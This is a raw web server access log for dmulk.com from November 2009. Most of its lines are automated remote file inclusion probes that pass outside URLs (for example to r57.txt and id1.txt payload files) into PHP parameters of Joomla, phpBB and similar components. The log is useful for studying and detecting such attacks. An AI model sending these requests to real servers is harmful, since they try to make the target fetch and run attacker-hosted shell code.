210.115.180.221 - - [20/Nov/2009:08:47:44 -0800] "GET /logs/access_090809.log//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:08:47:44 -0800] "GET /setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:08:47:44 -0800] "GET /logs//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:08:47:47 -0800] "GET /logs/access_090810.log//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.158.62.86 - - [20/Nov/2009:08:47:47 -0800] "GET /logs/access_080321.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.exgamesbrasil.com.br/scan2/FX29ID.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:08:47:49 -0800] "GET /logs//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:08:47:49 -0800] "GET /logs/access_090809.log%20%20//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:08:47:49 -0800] "GET /setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:08:48:03 -0800] "GET /logs/access_090810.log%20%20//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:08:49:01 -0800] "GET /logs/access_091005.log%20%20////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:08:49:01 -0800] "GET /logs////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 126797 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:08:49:02 -0800] "GET ///////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 15969 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:08:49:25 -0800] "GET /logs/access_091005.log%20%20////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:08:49:25 -0800] "GET /logs////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 126797 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:08:49:26 -0800] "GET ///////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 15968 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.98.18 - - [20/Nov/2009:08:50:11 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
117.74.98.18 - - [20/Nov/2009:08:50:11 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
117.74.98.18 - - [20/Nov/2009:08:50:11 -0800] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
117.74.98.18 - - [20/Nov/2009:08:50:12 -0800] "GET /logs/access_071103.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:08:50:20 -0800] "GET /logs/access_091024.log//appserv/main.php?appserv_root=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.249.79 - - [20/Nov/2009:08:50:55 -0800] "GET /modifyform.html?code=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
124.217.249.79 - - [20/Nov/2009:08:50:55 -0800] "GET /logs/modifyform.html?code=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
124.217.249.79 - - [20/Nov/2009:08:50:55 -0800] "GET /logs/access_080106.log%20%20/modifyform.html?code=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
124.217.249.79 - - [20/Nov/2009:08:51:00 -0800] "GET /modifyform.html?code=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.249.79 - - [20/Nov/2009:08:51:00 -0800] "GET /logs/modifyform.html?code=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.249.79 - - [20/Nov/2009:08:51:00 -0800] "GET /logs/access_071226.log%20%20/modifyform.html?code=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:08:53:41 -0800] "GET /logs/access_080208.log HTTP/1.0" 200 1325284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:53:45 -0800] "GET /logs/scriptsold.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:53:45 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:53:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:53:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:53:46 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:53:46 -0800] "GET /logs/scriptsold.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:54:10 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:54:10 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:54:10 -0800] "GET /logs/access_090502.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:54:48 -0800] "GET /logs/access_080419.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.245.220.82 - - [20/Nov/2009:08:54:52 -0800] "GET /logs/access_080125.log/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:55:16 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:55:16 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:55:16 -0800] "GET /logs/access_090502.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:56:02 -0800] "GET /logs/access_080419.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.245.220.82 - - [20/Nov/2009:08:56:14 -0800] "GET /logs/access_080706.log/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:56:18 -0800] "GET /logs/access_080925.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:56:19 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.143.49.246 - - [20/Nov/2009:08:56:22 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:56:26 -0800] "GET /logs/access_080925.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:56:28 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:56:29 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:56:35 -0800] "GET /logs/access_080925.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:56:36 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:56:36 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:56:42 -0800] "GET /logs/access_080925.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:56:42 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:56:42 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:56:45 -0800] "GET /logs/access_090809.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:56:48 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:56:58 -0800] "GET /logs/access_090809.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.249.68.200 - - [20/Nov/2009:08:57:18 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0052.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
94.125.181.11 - - [20/Nov/2009:08:57:30 -0800] "GET /logs/access_090809.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
94.198.53.208 - - [20/Nov/2009:08:57:40 -0800] "GET /logs/access_090809.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.49.246 - - [20/Nov/2009:08:58:02 -0800] "GET /logs/access_080925.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [20/Nov/2009:08:58:03 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [20/Nov/2009:08:58:03 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:58:13 -0800] "GET /logs/access_090123.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:08:58:13 -0800] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:58:30 -0800] "GET /logs/scriptsold.log//tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:08:58:32 -0800] "GET /logs/scriptsold.log//tools/send_reminders.php?noSet=0&includedir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:08:59:31 -0800] "GET /logs/access_091005.log////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
221.143.49.246 - - [20/Nov/2009:08:59:49 -0800] "GET /logs/access_090809.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
117.74.98.18 - - [20/Nov/2009:09:00:04 -0800] "GET /logs/access_080313.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:00:15 -0800] "GET /logs/access_091030.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:00:15 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:00:20 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:00:20 -0800] "GET /logs/access_091110.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.58.71.90 - - [20/Nov/2009:09:00:31 -0800] "GET /logs/index.php?side=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.58.71.90 - - [20/Nov/2009:09:00:31 -0800] "GET /logs/access_080515.log/index.php?side=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.58.71.90 - - [20/Nov/2009:09:00:35 -0800] "GET /index.php?side=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 15813 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:09:00:56 -0800] "GET /bikes/dteel/DesertSTOC07/?D=A HTTP/1.0" 200 7603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.101.214.54 - - [20/Nov/2009:09:01:17 -0800] "GET /logs/index.php?GALLERY_BASEDIR=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [20/Nov/2009:09:01:18 -0800] "GET /index.php?GALLERY_BASEDIR=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 15826 "-" "Mozilla/5.0" "www.dmulk.com"
200.58.71.90 - - [20/Nov/2009:09:01:27 -0800] "GET /logs/access_090905.log/index.php?side=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:09:01:47 -0800] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [20/Nov/2009:09:01:47 -0800] "GET /logs/access_090123.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.58.71.90 - - [20/Nov/2009:09:01:53 -0800] "GET /logs/access_090905.log/index.php?side=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [20/Nov/2009:09:01:59 -0800] "GET /logs/access_080530.log%20%20/index.php?GALLERY_BASEDIR=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
117.74.98.18 - - [20/Nov/2009:09:01:59 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
117.74.98.18 - - [20/Nov/2009:09:01:59 -0800] "GET /logs/access_071107.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:03:15 -0800] "GET /logs/access_091030.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:03:31 -0800] "GET /logs/access_091110.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
221.143.49.246 - - [20/Nov/2009:09:03:45 -0800] "GET /zboard/include/write.php?dir=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:21 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:21 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:21 -0800] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:09:04:25 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:09:04:25 -0800] "GET /logs/access_091013.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:09:04:25 -0800] "GET /logs/access_091105.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:09:04:25 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:25 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:25 -0800] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:30 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.96.178 - - [20/Nov/2009:09:04:32 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.96.178 - - [20/Nov/2009:09:04:32 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.96.178 - - [20/Nov/2009:09:04:35 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.96.178 - - [20/Nov/2009:09:04:35 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.96.178 - - [20/Nov/2009:09:04:36 -0800] "GET /logs/access_091106.log//include/print_category.php?setup[use_category]=1&dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:37 -0800] "GET /logs/access_090409.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:37 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.125.107.130 - - [20/Nov/2009:09:04:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/test1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.96.178 - - [20/Nov/2009:09:04:38 -0800] "GET /logs/access_091106.log//include/print_category.php?setup[use_category]=1&dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:09:04:42 -0800] "GET /logs/access_091013.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.112.174 - - [20/Nov/2009:09:04:42 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.sejongit.com/next.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
